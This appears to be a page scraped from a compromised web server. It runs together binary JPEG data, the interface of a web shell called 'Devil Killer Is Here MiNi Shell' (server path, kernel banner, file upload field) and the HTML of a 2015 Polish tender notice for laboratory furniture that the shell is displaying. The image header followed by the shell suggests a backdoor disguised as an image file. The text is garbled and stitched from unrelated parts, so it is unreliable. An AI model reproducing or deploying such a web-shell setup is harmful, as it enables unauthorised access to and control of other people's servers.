JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150731/194960-N-2015.html

<p class="kh_header"><b>Puławy: Dostawa mebli laboratoryjnych dla Centrum Badawczego Nawozów</b><br>
<b>Numer ogłoszenia: 194960 - 2015; data zamieszczenia: 31.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Nowych Syntez Chemicznych , Aleja Tysiąclecia Państwa Polskiego 13A, 24-110 Puławy, woj. lubelskie, tel. 81 473 14 00, faks 81 473 14 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ins.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli laboratoryjnych dla Centrum Badawczego Nawozów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż mebli laboratoryjnych.

Szczegółowy opis przedmiotu zamówienia zawiera Załącznik Nr 8 do SIWZ 

III.1 Zakres dostawy obejmuje:
1)	Dostawa i montaż mebli oraz dygestoriów i instalacja ich wyposażenia zgodnie z załącznikiem Nr 8.
2)	Deklarację zgodności WE (podstawa naniesionego oznaczenia CE) - w języku polskim.
3)	Deklaracja zgodności z normami:
a)	PN-EN 61010-1:2011 Wymagania bezpieczeństwa dotyczące elektrycznych przyrządów pomiarowych, automatyki i urządzeń laboratoryjnych. Część 1 - Wymagania ogólne , lub równoważna.
b)	PN-EN 60529: 2003 Stopnie ochrony zapewnianej przez obudowy (Kod IP) lub równoważna.
c)	PN-EN 61140: 2005 Ochrona przed porażeniem prądem elektrycznym - Wspólne aspekty instalacji i urządzeń lub równoważna.
d)	PN-EN 61293: 2000 Znakowanie urządzeń elektrycznych danymi znamionowymi dotyczącymi zasilania elektrycznego - Wymagania bezpieczeństwa, lub równoważna.
e)	PN-EN 60445: 2011 Zasady podstawowe i bezpieczeństwa przy współdziałaniu człowieka z maszyną, oznaczanie i identyfikacja - Identyfikacja zacisków urządzeń i zakończeń przewodów lub równoważna.
f)	PN-EN 13150: 2004 Stoły robocze dla laboratoriów. Wymiary, wymagania bezpieczeństwa i metody badań lub równoważna.
g)	PN-EN 14056: 2005 Meble laboratoryjne. Zalecenia dotyczące projektowania i instalowania lub równoważna.
h)	PN-EN 13792:2003 Kod barwny do oznaczania zaworów w obsłudze laboratoriów lub równoważna.
i)	PN-IEC 60364-7-713: 2005 Instalacje elektryczne w obiektach budowlanych. Wymagania dotyczące specjalnych instalacji lub lokalizacji - Meble,  lub równoważna.
j)	PN-EN 14175-2 : 2006 Wyciągi laboratoryjne ,część 2: Wymagania bezpieczeństwa i sprawności działania lub równoważna.
8)	Atest badań na niepalność na krzesła tapicerowane wystawiony przez niezależny od producenta, uprawniony podmiot prawny
8)  Certyfikat ISO 9001:2008 w zakresie projektowania, produkcji, sprzedaży, montażu i
      serwisu mebli laboratoryjnych i dygestoriów.
9)	Karty gwarancyjne w języku polskim,
10)	Instrukcje obsługi i zasady eksploatacji dygestoriów i mebli - w wersji papierowej i na nośniku elektronicznym (płycie CD) w język polskim,
III. 2 Wymagana zawartość oferty technicznej
1)	Potwierdzenie zgodności oferty technicznej z zakresem i wymaganiami niniejszej SIWZ,
2)	Karty katalogowe oferowanych mebli, dygestoriów. W przypadku folderów zawierających także inne rodzaje mebli Zamawiający wymaga zaznaczenia tych, które Wykonawca oferuje w przedmiotowym postępowaniu
3)	Certyfikat lub zaświadczenie wydane przez niezależną od producenta instytucję badawczą dla blatów dygestoriów, o którym mowa w SIWZ,
4)	Wyniki testów odporności chemicznej blatów dygestoriów oraz  odporności chemicznej i termicznej blatów stołów laboratoryjnych - testów o których mowa w SIWZ.
5)	Oświadczenie o  zgodności dostarczonych i zamontowanych mebli i dygestoriów z wymaganiami niniejszej SIWZ oraz z wymaganiami norm zgodnie z załącznikiem nr 6 do SIWZ
6)	Atesty higieniczne na: blaty z ceramiki monolitycznej, dygestoria, meble laboratoryjne i krzesła laboratoryjne wystawione przez niezależny od producenta, uprawniony podmiot prawny 
7)	Atest badań wytrzymałościowych dla krzeseł laboratoryjnych wystawiony przez niezależny  od producenta, uprawniony podmiot prawny. 
8)	W odniesieniu do blatów z ceramiki monolitycznej dodatkowo:
a)	Świadectwo z Zakresu Higieny Radiacyjnej o spełnieniu wymogów z zakresu
     Higieny radiacyjnej,
b)	Raport lub sprawozdanie wydane przez niezależny od producenta, uprawniony
    podmiot prawny określający wartość odporności na:
-  twardość powierzchni: wg normy DIN 101 lub równoważnej minimum 8 w skali Mohsa,
-  odporność na pękanie włoskowate metodą Harkorta do temperatury minimum 170oC
-  minimum 5 klasę odporności na plamienie  wg PN - EN ISO 10545 - 14 lub                          
       równoważne
- chemoodporność wg normy PN EN ISO 10545 -13 lub równoważnej na minimum 25 substancji chemicznych (w tym barwników) takich jak: 10% roztwór NH4Cl,  20% roztwór NaClO,  3% roztwór HCl,  18% roztwór HCl,  KOH 30 g/l, KOH 100 g/l, 10% roztwór C6H8O7, 5% roztwór C3H6O3, czerwień kongo min. 1% , fiolet krystaliczny min. 1%, kwas siarkowy min. 96 %, kwas azotowy min 70 %, kwas chlorowodorowy 37 %, kwas  fosforowy min. 85%, wodorotlenek sodu  min.40%, chloroform, toluen, fenol min 85%, eozyna min.1%, jodyna, formaldehyd min 40%, aceton, azotan srebra min. 10%, woda królewska,  kwas nadchlorowy min.60 %, kwas bromowodorowy min.48%, wodorotlenek amonu, nadtlenek wodoru
9)	Opinię o przydatności granitu na blaty robocze stołów laboratoryjnych, wydaną przez niezależną od producenta jednostkę badawczą. (Wyklucza się opinię użytkownika)


Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia zgodnie z wymogami określonymi w dokumentacji technicznej, zasadami wiedzy technicznej, obowiązującymi przepisami i normami a w szczególności z zachowaniem Polskich Norm, przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy.
Przedmiot zamówienia powinien odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu, oraz posiadać certyfikaty bezpieczeństwa, deklarację zgodności lub certyfikat zgodności z Polską Normą przenoszącą normy europejskie lub aprobatą techniczną.

Wymagany okres gwarancji:
Minimalny wymagany okres gwarancji na meble 36 miesięcy od daty podpisania protokołu odbioru przedmiotu umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 5.000,00 PLN (słownie: pięć tysięcy złotych 00/100). Wadium wnosi się przed upływem terminu składania ofert. Wadium wnosi się w PLN. 
Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu, na konto Zamawiającego 
numer konta PLN - 03 1240 2412 1111 0000 3610 6855
z dopiskiem:
Wadium w przetargu nieograniczonym: Dostawa i montaż mebli laboratoryjnych dla Centrum Badawczego Nawozów  Znak INS/ZBN- 27/2015, 

2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. nr 42, poz. 275).
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany powyżej.
Wadium wniesione w pieniądzu Zamawiający przechowuje na wskazanym powyżej rachunku bankowym.
Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.
W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja ma być, co najmniej gwarancją nieodwołalną i płatną na pierwsze pisemne żądanie Zamawiającego.
Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą. Jeżeli przedłużenie terminu związania ofertą dokonywane jest po wyborze oferty najkorzystniejszej, obowiązek wniesienia nowego wadium lub jego przedłużenia dotyczy jedynie wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 

Do oferty należy dołączyć dokument potwierdzający wniesienie wadium przez Wykonawcę tzn.:
a)	oryginał lub potwierdzoną za zgodność z oryginałem przez osoby uprawnione do podpisania oferty kopię polecenia przelewu na konto Zamawiającego, lub
b)	oryginał dokumentu będący każdą inną formą wadium dopuszczoną przez Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunki udziału w postępowaniu zostaną spełnione, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli wykonawca działa krócej, w tym okresie) wykonał należycie co najmniej 1 dostawę mebli laboratoryjnych o wartości co najmniej 120.000,00 PLN netto, z podaniem wartości, przedmiotu, dat wykonania oraz podmiotów na rzecz których dostawa została wykonana wraz z dowodami potwierdzającymi należyte jej wykonanie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunki udziału w postępowaniu zostaną spełnione, jeżeli wykonawca wykaże, że:
a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 120.000,00PLN (słownie: sto dwadzieścia tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o zgodności oferowanych mebli z normami wymienionymi w pkt III. 2 Wymagana zawartość oferty technicznej
1)	Potwierdzenie zgodności oferty technicznej z zakresem i wymaganiami niniejszej SIWZ,
2)	Karty katalogowe oferowanych mebli, dygestoriów. W przypadku folderów zawierających także inne rodzaje mebli Zamawiający wymaga zaznaczenia tych, które Wykonawca oferuje w przedmiotowym postępowaniu
3)	Certyfikat lub zaświadczenie wydane przez niezależną od producenta instytucję badawczą dla blatów dygestoriów, o którym mowa w SIWZ,
4)	Wyniki testów odporności chemicznej blatów dygestoriów oraz  odporności chemicznej i termicznej blatów stołów laboratoryjnych - testów o których mowa w SIWZ.
5)	Oświadczenie o  zgodności dostarczonych i zamontowanych mebli i dygestoriów z wymaganiami niniejszej SIWZ oraz z wymaganiami norm zgodnie z załącznikiem nr 6 do SIWZ
6)	Atesty higieniczne na: blaty z ceramiki monolitycznej, dygestoria, meble laboratoryjne i krzesła laboratoryjne wystawione przez niezależny od producenta, uprawniony podmiot prawny 
7)	Atest badań wytrzymałościowych dla krzeseł laboratoryjnych wystawiony przez niezależny  od producenta, uprawniony podmiot prawny. 
8)	W odniesieniu do blatów z ceramiki monolitycznej dodatkowo:
a)	Świadectwo z Zakresu Higieny Radiacyjnej o spełnieniu wymogów z zakresu
     Higieny radiacyjnej,
b)	Raport lub sprawozdanie wydane przez niezależny od producenta, uprawniony
    podmiot prawny określający wartość odporności na:
-  twardość powierzchni: wg normy DIN 101 lub równoważnej minimum 8 w skali Mohsa,
-  odporność na pękanie włoskowate metodą Harkorta do temperatury minimum 170oC
-  minimum 5 klasę odporności na plamienie  wg PN - EN ISO 10545 - 14 lub                          
       równoważne
- chemoodporność wg normy PN EN ISO 10545 -13 lub równoważnej na minimum 25 substancji chemicznych (w tym barwników) takich jak: 10% roztwór NH4Cl,  20% roztwór NaClO,  3% roztwór HCl,  18% roztwór HCl,  KOH 30 g/l, KOH 100 g/l, 10% roztwór C6H8O7, 5% roztwór C3H6O3, czerwień kongo min. 1% , fiolet krystaliczny min. 1%, kwas siarkowy min. 96 %, kwas azotowy min 70 %, kwas chlorowodorowy 37 %, kwas  fosforowy min. 85%, wodorotlenek sodu  min.40%, chloroform, toluen, fenol min 85%, eozyna min.1%, jodyna, formaldehyd min 40%, aceton, azotan srebra min. 10%, woda królewska,  kwas nadchlorowy min.60 %, kwas bromowodorowy min.48%, wodorotlenek amonu, nadtlenek wodoru
9)	Opinię o przydatności granitu na blaty robocze stołów laboratoryjnych, wydaną przez niezależną od producenta jednostkę badawczą. (Wyklucza się opinię użytkownika)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany umowy w następującym zakresie:
11.6.1. zmiana stawki i kwoty podatku VAT oraz wynagrodzenia brutto określonych w Artykule 2, odpowiednio do przepisów prawa wprowadzających zmianę.
11.6.2. terminów realizacji przedmiotu umowy, gdy jest ona spowodowana:
a) 	następstwem okoliczności leżących po stronie Zamawiającego takich jak utrudnienia, zawieszenia prac lub przeszkodami dającymi się przypisać Zamawiającemu,
b)	koniecznością wykonania innej umowy lub czynności powiązanych z niniejszą umową,
11.6.3. osób przewidzianych do koordynacji umowy.
11.6.4. treści Załącznika Nr 2 gdy jest ona spowodowana koniecznością uwzględnienia postępu technicznego, technologią wykonania, dostępnością surowców, półfabrykatów lub komponentów albo koniecznością dostosowania do obowiązujących przepisów prawa,
11.7. Strony zamienią treść w umowy w zakresie dopuszczalnych zmian w sposób następujący:
ad.11.6.2.a)- terminy realizacji umowy zostaną zmienione o czas zaistniałej okoliczności
ad.11.6.2b) -terminy realizacji umowy zostaną zmienione o czas potrzebny do wykonania innej umowy bądź czynności powiązanych z niniejszą umową.
ad.11.6.3.- osoby wskazane w umowie do koordynacji będą zastąpione innymi osobami o niezbędnych kwalifikacjach do prowadzenia koordynacji, jeżeli z jakichkolwiek przyczyn osoby dotychczas wskazane nie mogą powierzonych czynności wykonywać
ad.11.6.4. zmiana umowy będzie dokonana pod warunkiem, że zmiana nie powoduje pogorszenia cech przedmiotu umowy oraz nie powoduje zmiany ceny za realizację przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ins.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Nowych Syntez Chemicznych Al. Tysiąclecia Państwa Polskiego 13a, 24-110 Puławy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2015 godzina 10:30, miejsce: Instytut Nowych Syntez Chemicznych Al. Tysiąclecia Państwa Polskiego 13a, 24-110 Puławy, Budynek E-40, Kancelaria, pokój nr 50.</p>
